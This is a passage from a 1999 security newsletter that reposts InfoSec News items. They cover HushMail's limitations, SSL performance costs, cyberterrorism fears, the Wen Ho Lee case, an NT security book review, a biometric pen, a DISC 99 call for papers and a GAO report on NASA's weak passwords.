HushMail relies heavily on Java (JVM 1.1.5 or higher), so it can only be
used with the latest browsers. The earliest workable version of Netscape's
browser is 4.04, but some features don't work in versions before 4.07; the
latest version, 4.5, is best. For Internet Explorer users, 4.5 is
recommended, but the latest Windows release of IE 4.0 (subversion
4.72.3110) works as well. Red Hat Linux version 5.2 is also tested and
supported. Unfortunately, HushMail does not work on Macintoshes, due to
limitations in Apple's Java implementation. (Mac users can crawl HushMail
under Connectix Virtual PC. Note that I don't say "run." I've tried this
interpretation-under-emulation and do not recommend it.) The company is
trying urgently to connect with the right people at Apple to get this
situation remedied.
One of the limitations of this early release of HushMail is that
encryption can only be used to and from another HushMail account. It is
not currently possible to export your public/private key-pair, to set up
automatic forwarding of mail sent to a HushMail account, or to import
non-Hush public keys. I spoke with Cliff Baltzley, Hush's CEO and chief
technical wizard. He stresses that Hush's desire and intention is to move
toward interoperability with other players in the crypto world, such as
PGP and S/MIME. The obstacles to doing so are the constraints on technical
resources (read: offshore crypto programmers) and legal questions of
intellectual property. Baltzley believes that HushMail's positive impact
on privacy worldwide will be enhanced by maximizing the product's
openness.
[1] https://www.hushmail.com/
[2] https://www.hushmail.com/faq.htm
[3] https://www.hushmail.com/tech_description.htm
[4] http://world.std.com/~reinhold/diceware.html
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
32.0 [ISN] E-Biz Bucks Lost Under SSL Strain
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 22 May 1999 06:17:04 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] E-Biz Bucks Lost Under SSL Strain
http://www.internetwk.com/lead/lead052099.htm
Thursday, May 20, 1999
E-Biz Bucks Lost Under SSL Strain
By TIM WILSON
A customer stuffs his shopping cart with goodies from your Web site.
Credit card in hand, he waits for a secure connection to consummate the
deal. And waits. Finally, short of patience, he dumps the contents and
logs off.
It may sound like an e-commerce manager's nightmare, but according to the
latest Web server performance statistics, it's an increasingly common
phenomenon.
The ghost in the machine is Secure Sockets Layer, the commonly used method
of securing communications between users and Web sites.
Recent tests conducted by researcher Networkshop Inc. indicate that
powerful Web servers capable of handling hundreds of transactions per
second may be brought to a near standstill by heavy SSL traffic. Some
server configurations suffered as much as a fiftyfold degradation in
performance from SSL, down to just a few transactions per second,
according to analyst Alistair Croll at Networkshop.
The growing problem of SSL performance has driven vendors to develop
devices that can help share the Web server's processing load. IPivot Inc.
next month will ship two new processors that can offload authentication
and encryption on e-commerce sites.
IT managers and other experts have known for years that SSL, which
requires the authentication and encryption of Web server connections, can
significantly slow site performance. But the problem is rapidly becoming
more chronic as companies increase secured Web transactions, they said.
"Our business is very seasonal, and a lot of it is concentrated in the
fourth quarter. This past December, we found ourselves shuffling servers
around to handle the load," said Stephen McCollum, network architect at
Hewitt Associates. The $858 million company manages benefits plans for
large organizations, and because Hewitt's Web traffic is personal and
confidential, virtually all of it is conducted via SSL.
Hewitt is far from alone in its reliance on SSL. According to a study
conducted by research company Netcraft Ltd., SSL implementations doubled
from 15,000 sites to more than 35,000 sites between 1998 and 1999. And
many of those server sites are struggling under the load.
"I'd guess that somewhere between 10 and 25 percent of [e-commerce]
transactions are aborted because of slow response times," said Rodney
Loges, vice president of business development at Digital Nation, a Web
hosting company.
That translates to as much as $1.9 billion in lost revenue, using
Forrester Research numbers for 1998 of $7.8 billion in e-retail sales.
According to Networkshop, even the most powerful, general-purpose Web
server hardware can be dragged down by large volumes of SSL traffic. In
its most recent tests, the research company found that a typical Pentium
server configuration running Linux and Apache, which at full capacity can
handle about 322 connections per second of standard HTTP traffic, fell to
about 24 connections per second when handling a full load of SSL traffic.
A similar test conducted on a Sun 450 server running Solaris and Apache
experienced even more trouble. The server handled about 500 connections
per second of HTTP traffic at full capacity, but only about 3 connections
per second when the traffic was secured via SSL. Networkshop tests of
quad-processor configurations showed that those performance ratios scale
to multiserver environments as well, Croll said.
A few vendors, such as Rainbow Technologies Inc., have solved the problem
by offloading security processing onto a dedicated co-processor card that
slips into a server. But as SSL traffic increases, adding and managing
co-processor boards becomes unwieldy, IT managers said. "We found that the
[co-processor] cards were kind of a kludge, because they have to be added
to every server," said Digital Nation's Loges.
IPivot will begin shipping two external SSL processors--the Commerce
Accelerator 1000 and the Commerce Director 8000, which includes IPivot's
load-balancing system--to help eliminate SSL bottlenecks.
The Commerce Accelerator 1000 is priced at $9,995; the Commerce Director
8000 costs $39,950.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
33.0 [ISN] Bracing for guerrilla warfare in cyberspace
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 22 May 1999 06:22:31 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Bracing for guerrilla warfare in cyberspace
[Moderator: Warning - A fair share of FUD in this article.]
Forwarded From: Sunit Nangia <sunit@cerf.net>
http://www.cnn.com/TECH/specials/hackers/cyberterror/
Bracing for guerrilla warfare in cyberspace
'There are lots of opportunities; that's very scary'
April 6, 1999
By John Christensen
CNN Interactive
(CNN) -- It is June, the children are out of school, and as highways and
airports fill with vacationers, rolling power outages hit sections of Los
Angeles, Chicago, Washington and New York. An airliner is mysteriously
knocked off the flight control system and crashes in Kansas.
Parts of the 911 service in Washington fail, supervisors at the Department
of Defense discover that their e-mail and telephone services are disrupted
and officers aboard a U.S. Navy cruiser find that their computer systems
have been attacked.
As incidents mount, the stock market drops precipitously, and panic surges
through the population.
Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism
czar Richard A. Clarke fears is not just a threat, it has already
happened.
Much of the scenario above -- except for the plane and stock market
crashes and the panic -- occurred in 1997 when 35 hackers hired by the
National Security Agency launched simulated attacks on the U.S.
electronic infrastructure.
"Eligible Receiver," as the exercise was called, achieved "root level"
access in 36 of the Department of Defense's 40,000 networks. The simulated
attack also "turned off" sections of the U.S. power grid, "shut down"
parts of the 911 network in Washington, D.C., and other cities and gained
access to systems aboard a Navy cruiser at sea.
At a hearing in November 1997, Sen. Jon Kyl, R-Arizona, chairman of a
Senate technology subcommittee, reported that nearly two-thirds of U.S.
government computer systems have security holes.
"If somebody wanted to launch an attack," says Fred B. Schneider, a
professor of computer science at Cornell University, "it would not be at
all difficult."
'There are lots of opportunities'
Although "Eligible Receiver" took place in the United States, which has
about 40 percent of the world's computers, the threat of cyberterrorism is
global.
Consider:
* During the Gulf War, Dutch hackers stole information about U.S. troop
movements from U.S. Defense Department computers and tried to sell it to
the Iraqis, who thought it was a hoax and turned it down.
* In March 1997, a 15-year-old Croatian youth penetrated computers at a
U.S. Air Force base in Guam.
* In 1997 and 1998, an Israeli youth calling himself "The Analyzer"
allegedly hacked into Pentagon computers with help from California
teen-agers. Ehud Tenenbaum, 20, was charged in Jerusalem in February 1999
with conspiracy and harming computer systems.
* In February 1999, unidentified hackers seized control of a British
military communication satellite and demanded money in return for control
of the satellite.
The report was vehemently denied by the British military, which said all
satellites were "where they should be and doing what they should be
doing." Other knowledgeable sources, including the Hacker News Network,
called the hijacking highly unlikely.
"There are lots of opportunities," says Schneider. "That's very scary."
'The Holy Grail of hackers'
President Clinton announced in January 1999 a $1.46 billion initiative to
deal with U.S. government computer security -- a 40 percent increase over
fiscal 1998 spending. Of particular concern is the Pentagon, the military
stronghold of the world's most powerful nation.
"It's the Holy Grail of hackers," says computer security expert Rob Clyde.
"It's about bragging rights for individuals and people with weird
agendas."
Clyde is vice president and general manager of technical security for
Axent Technologies, a company headquartered in Rockville, Maryland, that
counts the Pentagon as one of its customers.
The Defense Department acknowledges between 60 and 80 attacks a day,
although there have been reports of far more than that.
The government says no top secret material has ever been accessed by these
intruders, and that its most important information is not online. But the
frustration is evident.
Michael Vatis, director of the FBI's National Infrastructure Protection
Committee, told a Senate subcommittee last year that tracing cyberattacks
is like "tracking vapor."
'A lot of clueless people'
Schneider says the "inherently vulnerable" nature of the electronic
infrastructure makes counterterrorism measures even more difficult.
Schneider chaired a two-year study by the National Academy of Sciences and
the National Academy of Engineering that found that the infrastructure is
badly conceived and poorly secured.
"There is a saying that the amount of 'clue' [knowledge] on the Internet
is constant, but the size of the Internet is growing exponentially," says
Schneider. "In other words, there are a lot of clueless people out there.
It's basically a situation where people don't know how to lock the door
before walking out, so more and more machines are vulnerable."
Schneider says the telephone system is far more complicated than it used
to be, with "a lot of nodes that are programmable, and databases that can
be hacked." Also, deregulation of the telephone and power industries has
created another weakness: To stay competitive and cut costs, companies
have reduced spare capacity, leaving them more vulnerable to outages and
disruptions in service.
Still another flaw is the domination of the telecommunications system by
phone companies and Internet service providers (ISPs) that don't trust
each other. As a result, the systems do not mesh seamlessly and are
vulnerable to failures and disruptions.
"There's no way to organize systems built on mutual suspicion," Schneider
says. "We're subtly changing the underpinnings of the system, but we're
not changing the way they're built. We'll keep creating cracks until we
understand that we need a different set of principles for the components
to deal with each other."
'The democratization of hacking'
Meanwhile, the tools of mayhem are readily available.
There are about 30,000 hacker-oriented sites on the Internet, bringing
hacking -- and terrorism -- within the reach of even the technically
challenged.
"You no longer have to have knowledge, you just have to have the time,"
Clyde says. "You just download the tools and the programs. It's the
democratization of hacking. And with these programs ... they can click on
a button and send bombs to your network, and the systems will go down."
Schneider says another threat is posed not by countries or terrorists, but
by gophers and squirrels and farmers.
In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking
out 60 percent of the regional and long distance phone service in New York
City and air traffic control functions in Boston, New York and Washington.
In 1996, a rodent chewed through a cable in Palo Alto, California, and
knocked Silicon Valley off the Internet for hours.
"Although the press plays up the security aspect of hacker problems,"
says Schneider, "the other aspect is that the systems are just not built
very reliably. It's easy for operators to make errors, and a gopher
chewing on a wire can take out a large piece of the infrastructure. That's
responsible for most outages today."
'The prudent approach'
Schneider and Clyde favor a team of specialists similar to Clinton's
proposed "Cyber Corps" program, which would train federal workers to
handle and prevent computer crises. But they say many problems can be
eliminated with simple measures.
These include "patches" for programs, using automated tools to check for
security gaps and installing monitoring systems and firewalls. Fixes are
often free and available on the Internet, but many network administrators
don't install them.
A step toward deterrence was taken in 1998 when CIA Director George Tenet
announced that the United States was devising a computer program that
could attack the infrastructure of other countries.
"That's nothing new," says Clyde, "but it's the first time it was publicly
announced. If a country tries to destroy our infrastructure, we want to be
able to do it back. It's the same approach we've taken with nuclear
weapons, the prudent approach."
The U.S. Government Accounting Office estimates that 120 countries or
groups have or are developing information warfare systems. Clyde says
China, France and Israel already have them, and that some Pentagon
intrusions have surely come from abroad.
"We don't read about the actual attacks," says Clyde, "and you wouldn't
expect to."
"The Analyzer" was caught after he bragged about his feat in computer chat
rooms, but Clyde says the ones to worry about are those who don't brag and
don't leave any evidence behind.
"Those are the scary ones," he says. "They don't destroy things for the
fun of it, and they're as invisible as possible."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
34.0 [ISN] Prosecuting Lee Is Problematic
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 00:05:43 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Prosecuting Lee Is Problematic
http://www.washingtonpost.com/wp-srv/WPlate/1999-05/24/080l-052499-idx.html
Prosecuting Lee Is Problematic
Physicist's Mishandling of Computer Data May Not Be Crime
By Vernon Loeb and Walter Pincus
Washington Post Staff Writers
Monday, May 24, 1999; Page A05
Espionage suspect Wen Ho Lee's transfer of top secret computer programs
from a classified to a vulnerable computer network at Los Alamos National
Laboratory has left federal prosecutors wrestling with the question of
whether such mishandling of classified information in cyberspace
constitutes a crime.
Lacking evidence of espionage, FBI agents have focused on Lee's
unauthorized data transfer ever since they searched his desktop computer
in March and discovered top secret "legacy codes" in a system that could
have been accessed by hackers.
But there is no known prosecution of anyone for transferring classified
data from classified to unclassified government computer systems, leaving
prosecutors to fathom the frontiers of cybersecurity under espionage
statutes that make no reference to computers, according to lawyers
specializing in national security law and U.S. officials familiar with the
case.
Lee, 59, a Taiwan-born nuclear physicist who is a U.S. citizen, was fired
March 8 for alleged security violations at Los Alamos and identified by
U.S. officials as an espionage suspect, despite their inability to charge
him as a spy for China. Congress is investigating why the FBI and the
Justice Department failed to search his office computer prior to his
dismissal.
That slow response drew more criticism yesterday. The chairman of the
Senate intelligence committee, Richard C. Shelby (R-Ala.), renewed his
call for the ouster of Attorney General Janet Reno. Branding her handling
of the case "indefensible," Shelby said on CBS's "Face the Nation" that
"the attorney general ought to resign and she ought to take her top
lieutenants with her."
On the same show, Sen. Robert G. Torricelli (D-N.J.) also criticized Reno,
although he stopped short of advocating resignation: "It's time for
President Clinton to have a conversation with the attorney general about
her ability to perform her duties and whether or not it is in the national
interest for her to continue." Torricelli said Reno had displayed
"failures of judgment" that were "inexplicable." He singled out her
decision not to approve a wire tap of Lee "despite overwhelming evidence
that there was probable cause and that the national security was being
compromised."
White House spokesman Barry Toiv said Clinton "has full confidence in
Attorney General Reno," Reuters reported.
Lee has denied passing classified information to China and has said
through his attorney he took "substantial steps" to safeguard the
transferred computer codes.
A provision of the federal espionage statute makes the removal of
classified defense information from its "proper place of custody" through
"gross negligence" a felony punishable by up to 10 years in prison,
according to lawyers specializing in national security cases.
But it is unclear whether Lee could be charged under that provision,
absent intent on his part to make unlawful use of the data or evidence it
was obtained by unauthorized individuals, they said.
"You've got a clear security breech," said former CIA inspector general
Frederick Hitz. "But as far as a criminal prosecution . . . I would think
that's going to be tough."
Another law makes the "unauthorized removal and retention of classified
documents or material" at one's home a misdemeanor punishable by a maximum
$1,000 fine and one-year prison sentence. The measure was enacted to
safeguard classified materials against careless handling, not espionage.
Two former National Security Agency employees, a husband and wife, were
the first to be prosecuted under the law last year, pleading guilty to
having retained classified documents at their home after leaving
government service.
But the lawyers specializing in national security cases say they do not
believe the statute could be used against Lee, because he apparently did
not remove the programs from government property.
They said in two recent cases involving computer transfers of classified
information, one involving another Los Alamos scientist and the other,
former CIA director John M. Deutch, the Justice Department declined
prosecution.
The scientist at Los Alamos, who has not been publicly identified, moved
classified nuclear weapons data last year from the laboratory's classified
to its unclassified network in a transfer analogous to that performed by
Lee.
But the transfer was ultimately determined to have been "inadvertent,"
according to a senior Energy Department official. The FBI found no
criminal intent and closed the case, the official said.
Deutch was investigated by the Justice Department for transferring more
than 30 classified documents to his personal, unsecured laptop during his
tenure as CIA director from May 1995 to December 1996. The security breach
was discovered when CIA specialists went to his Washington home to remove
a classified computer and safe and discovered the classified files on his
personal computer.
Under CIA policy, Deutch's security violation was forwarded to Justice for
review, but officials there declined prosecution. The case was recently
returned to the CIA for review by Inspector General Britt Snider,
who is expected to complete a report on the matter soon.
Deutch, who does government consulting and teaches at Massachusetts
Institute of Technology, could have his security clearance lifted for a
period of time, one government source said.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
35.0 [ISN] Slip of the Tongue Lightens up Encryption Hearing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 00:01:24 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Slip of the Tongue Lightens up Encryption Hearing
http://www.nytimes.com/library/tech/99/05/cyber/articles/25capital.html
May 25, 1999
Slip of the Tongue Lightens up Encryption Hearing
By JERI CLAUSING
WASHINGTON - The Clinton Administration's point man on encryption policy
silenced his Congressional critics - momentarily, anyway -- with a slip
of the tongue at a House hearing last week.
"Never underestimate the stupidity of some of the people we have to deal
with," William A. Reinsch, Under Secretary of Commerce for the Bureau of
Export Administration, said while being grilled about whether terrorists
and criminals would be naïve enough to use the technology being pushed by
the Administration.
The House International Relations subcommittee meeting fell silent and
Reinsch turned bright red as he realized the double meaning of what he had
said. As the silence turned to laughter, Reinsch tried to backtrack,
blurting, "I didn't say that."
But it was enough to silence Representative Bradley J. Sherman. Sherman
promptly ended his grilling of Reinsch, who along with representatives of
the National Security Agency and the Federal Bureau of Investigation, was
testifying in defense of the Administration's encryption policy. The
Administration has tied any loosening of export controls on strong
encryption to the development of technology that would guarantee law
enforcement easy access to criminals' communications.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
36.0 [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 00:03:24 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
Forwarded From: "Rob Slade" <rslade@sprint.ca>
BKWNTSAC.RVW 990409
"Microsoft Windows NT 4.0 Security, Audit, and Control", James G.
Jumes et al, 1999, 1-57231-818-X, U$49.99/C$71.99/UK#45.99
%A James G. Jumes
%A Neil F. Cooper
%A Paula Chamoun
%A Todd M. Feinman
%C 1 Microsoft Way, Redmond, WA 98052-6399
%D 1999
%G 1-57231-818-X
%I Microsoft Press
%O U$49.99/C$71.99/UK#45.99 800-6777377 fax: 206-936-7329
%P 318 p.
%S Technical Reference
%T "Microsoft Windows NT 4.0 Security, Audit, and Control"
The primary audience described in the introduction seems to be security
professionals. However, system administrators, technology managers, and
CIOs are mentioned as well. The attempt at breadth of coverage usually
does not bode well in works like these.
Chapter one discusses an information security model based upon the
business (and other) objectives of the institution in question. While
valid as far as it goes, and even possibly helpful when formulating
security policy, this by no means provides a structure from which to view
either security policy or procedures, let alone implement a complex set of
controls. The widget company, beloved of management writers, is described
in chapter two. For the purposes of assessing security in real world
working environments, this particular widget company seems to be
astoundingly simple and homogeneous.
Chapter three starts out talking reasonably about security policy, starts
to get flaky in risk assessment (I would definitely worry about a .45
chance of an earthquake), and tails off into trivia. Monitoring, in
chapter four, looks first at system performance and diagnostics, and then
gets into event logging without really going into the concepts. Many
areas of physical security are left uncovered in chapter five. Chapter
six discusses domains, trust relationships, and remote access permissions.
Dialogue boxes for user accounts and groups are listed in chapter seven.
There is some mention of the commonly "received wisdom" in regard to these
topics, as there is in chapter eight regarding account policies, but
nothing very significant. File system, share, and other resource control
is covered in chapter nine. Chapter ten is a bit of a grab bag without
much focus. The registry is reviewed in chapter eleven. Chapter twelve
looks briefly at power supplies and backups. Although it talks about
auditing, chapter thirteen is more of a checklist of security features to
think about. Appendix A is a bit better in this regard: it lists
recommended settings across a number of functions for six different types
of systems.
There is some discussion of options as the various functions are
addressed, so, in a sense, this is a start towards full coverage of NT
security. It has a long way to go, though. In addition, the deliberation
comes at the cost of a loss of some detail in terms of security
implementation.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
37.0 [ISN] LCI Intros SMARTpen Biometric Signature Authentication
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 01:22:36 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] LCI Intros SMARTpen Biometric Signature Authentication
Forwarded From: 7Pillars Partners <partners@sirius.infonex.com>
LCI Intros SMARTpen Biometric Signature Authentication
S'HERTGENBOSCH, NETHERLANDS, 1999 MAY 24 (NB)
By Sylvia Dennis, Newsbytes.
LCI Technology has taken the wraps off its SMARTpen biometric signature
authentication system. The SMARTpen is billed as the world's first
wireless signature device and the only biometric unit of its type that
writes on normal paper. Sam Asseer, the firm's chairman, said that the unit
was designed for high-end security transactions. It is, he explained, a
wireless embedded computer system that looks and writes like a common
ballpoint pen.
In use, the SMARTpen uses built-in sensors that enable the authentication
of users through the biometric characteristics of their signatures on
regular paper.
"Electronic commerce is rapidly becoming the way the world does business,"
he said, adding that the surge in online transactions over the past two
years and the predictions for explosive growth going into the year 2000
suggests that the future of e-commerce is unlimited.
"But, as the number of Internet transactions increases, there is an even
greater demand for security to ensure confidentiality and prevent fraud.
Biometric authentication systems like the LCI SMARTpen help create the
secure environment necessary for the continued expansion of global
e-commerce," he said.
According to the firm, the SMARTpen measures individual signature
characteristics, encrypts the data and transmits it via radio frequency to
a computer, where LCI software compares it to a template for verification
- all in about three seconds.
The firm claims that the dynamics of signatures as measured by the
SMARTpen are personal and not directly visible from the written image.
This, the firm says, makes it virtually impossible for forged signatures
to get through the SMARTpen system. The system works with standard APIs
(application programming interfaces) and the false rejection/false
acceptance rate can be adjusted by system parameters, so adding
flexibility.
Pricing on the SMARTpen is expected to range from $100 to $250, depending
on the model and configuration of the product.
According to LCI, the price includes the pen and software components. The
SMARTpen also has integral sensors, a mouse, a digital signal processor,
radio transmitter and receiver, and encryption system.
LCI's Web site is at http://www.smartpen.net .
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
38.0 [ISN] CFP: DISC 99 Computer Security 99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 02:31:07 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] CFP: DISC 99 Computer Security 99
Forwarded From: Juan Carlos Guel Lopez <cguel@martini.super.unam.mx>
.---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'
____ ___ ____ ____ ___ ___
| _ \_ _/ ___| / ___| / _ \ / _ \
| | | | |\___ \| | | (_) | (_) |
| |_| | | ___) | |___ \__, |\__, |
|____/___|____/ \____| /_/ /_/
C o m p u t e r S e c u r i t y 9 9
"Working Together"
October 4-8, 1999
Palacio de Minería, México City, México.
.---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'
C A L L F O R P A R T I C I P A T I O N
The goal of Computer Security 99 (DISC 99) is to create awareness in
the computer user community about security strategies and mechanisms
used to protect information.
For the second consecutive year the DISC takes place alongside the
most important computing event of Mexico, the computing general
congress Computo.99@mx (http://www.computo99.unam.mx/), and invites
specialists in computer security to participate.
"Working Together" is the slogan for this year's event, suggesting
that security in the organization can only exist and be increased with
the work of all the people in the organization, including users,
management and security personnel.
The community is invited to participate in the DISC 99 event through
the presentation of theoretical, technical, and applied works and
those who present practical experience in the following topics (but
not limited to them):
@ > Electronic commerce
- Certification
- Digital cash
- New protocols
- Secure transactions
@ > New Firewall technologies
@ > World Wide Web security
- Secure Sockets Layer (SSL)
@ > Network security
@ > Security for software developers
@ > Security in distributed systems and data bases
@ > Security in agents and multi-platform languages
@ > Incident response teams
@ > Computer security incident handling, prevention and coordination
@ > Administrative and legal issues in the incident handling
@ > Software protection and intellectual property
@ > New tools for incident handling
@ > Attacks and intrusion detection
@ > Computer attacks
@ > Privacy and cryptography protocols
@ > Security policies
.......................
Who should attend ?
.......................
* System administrators who are interested in Computer
Security.
* People working in the field of Computer Security,
and handling Computer Security incidents.
* Anybody who is interested in Computer Security and wants to
meet other interested people. This event will help him or
her to improve security programs, security plans, and
security tools by sharing and getting a wide experience and
knowledge.
* People who want to establish incident response teams.
* Anybody who has a particular interest in network security,
monitoring tools, intrusion detection and firewalls.
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Important Dates
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Paper submissions: July 2
Acceptance notification: August 6
Final papers due: August 20
Event Dates: October 4-8
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Workshop Format
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
There will be tutorial-style presentations during October 4 and 5.
October 6, 7 and 8 will consist of conference papers and workshop-style
presentations, as well as business sessions.
Two evenings are allocated for participants to hold events devoted to
subjects of particular interest ("birds of a feather" sessions).
Contributions should follow the following guidelines:
1. Tutorials: Half or full day tutorial proposals will be
considered.
2. Papers: Written papers may be as long as desired, but
presentations must be limited to 30 minutes.
3. Workshops: These informal sessions should either follow a more
"hands-on" approach or provide for a high degree of
audience participation. They should be tailored to
address specific issues and should be from 60 to 90
minutes in duration. Panel Sessions on a particular
topic are also acceptable.
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Instruction for authors
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
We will receive proposals for presentations, workshops and tutorials
that follow these guidelines:
* The documents should be delivered by the indicated date.
* The contents of the documents should be high-quality and
original. It should also include an abstract that describes
the content and style of the presentation.
* The papers will be evaluated using the proposal, which has
to contain:
- title
- format (workshop, tutorials or conference)
- extended abstract (more than one but less than two pages)
- requirements for the presentation (computing
equipment, data projector, slide projector, etc.)
- author information
- name
- address and affiliation
- brief resume
- fax and telephone number
- e-mail address
* For tutorials, the following information should also be
included:
- goal
- introduction and summary
- outline of the presentation
- duration (half or full day)
- presentation material (slides)
....................
Accepted formats
....................
Authors whose papers are accepted must submit the complete paper to be
included in the Cómputo.99@mx proceedings.
Submissions will be accepted in the following formats:
- TeX/LaTeX
- PostScript
- Word for Windows
- ASCII
- Please contact the committee (disc99@asc.unam.mx) if
you need to use a different format.
Note: The specifications of the papers such as margins, font size and
line spacing will be specified in the DISC 99 WWW page at:
http://www.asc.unam.mx/disc99-i/convocatoria.html
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Program Committee
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
President:
-> Dr. Enrique Daltabuit
Centro Tecnologico, ENEP-Aragon, UNAM
-> M. en C. Diego Zamboni
CERIAS, Purdue University
-> Nicholas P. Cardo
Lawrence Berkeley National Laboratory
Computational Systems Group
...............
Submissions
...............
Presentations can be delivered using the following means:
o E-mail (disc99@asc.unam.mx)
o Post mail to the following address:
Área de Seguridad en Cómputo
Dirección General de Cómputo Académico
Circuito Exterior, Ciudad Universitaria
04510 México, D.F.
MEXICO
<>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>
Further Information
-------------------
E-mail : disc99@asc.unam.mx
WWW : http://www.asc.unam.mx/disc99-i/convocatoria.html
Address :
Área de Seguridad en Cómputo
Dirección General de Cómputo Académico
Circuito Exterior, Ciudad Universitaria
04510 México, D.F.
MEXICO
Telephone Number : (52-5) 622 81 69 and (52-5) 685 22 29
Fax : (52 5) 6 22 80 43
Subject: DISC 99
<>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
39.0 [ISN] GAO: NASA systems full of holes.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 02:56:28 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] GAO: NASA systems full of holes.
From: anon
http://www.fcw.com/pubs/fcw/1999/0524/fcw-newsnasa-5-24-99.html
MAY 24, 1999
GAO: NASA systems full of holes
BY DIANE FRANK (diane_frank@fcw.com)
Out-of-date information security policies have left significant
vulnerabilities in NASA's mission-critical systems that could allow
unauthorized users to steal, modify or delete important operational data,
according to a General Accounting Office report released last week.
GAO, working over the past year with experts from the National Security
Agency and using nothing more than public Internet access, was able to
gain access to several unclassified mission-critical systems, including
those supporting the command and control of spacecraft.
According to GAO, NASA has not created enough awareness among its
employees about common security mistakes and vulnerabilities, such as
easily guessed passwords. NSA initially breached some systems using
passwords such as "guest" for guest accounts and "adm" for system
administrators, opening the door for broader access to agency systems.
"The way we got in was through commonly known security faults," said John
de Ferrari, assistant director of the Accounting and Information
Management Division at GAO.
GAO concluded that it was able to penetrate systems because NASA does not
have a consistent information security management policy that the entire
agency follows. "A lot of what needs to be done is awareness-related; you
never seem to get enough awareness of computer security," de Ferrari said.
GAO found that NASA did not have many policies regarding Internet and
network security, and some policies the agency did have were out of date
or were not followed.
"We Had Become Quite Lax" "The fact of the matter is, we had become quite
lax in the agency in terms of passwords," said Lee Holcomb, NASA's chief
information officer. NASA now is scanning user passwords for ones that
could be easily cracked and to check new passwords for vulnerabilities.
"We take very seriously our responsibility for safeguarding our IT assets,
and after Y2K, security is our No. 1 priority," Holcomb said. "They
acknowledge that they did not succeed in penetrating several systems, but
the fact that they did succeed is troubling to us. It is a wake-up call to
the agency."
This report is an important addition to the work already occurring
throughout government to raise awareness of security needs, said Paul
Rodgers, senior executive at the Critical Infrastructure Assurance Office,
which is leading the national effort to protect critical systems. "The
dangers are increasing, and we think the GAO report delivers an important
message to NASA and other agencies," Rodgers said.
The GAO/NSA team could not penetrate certain pockets of NASA's systems
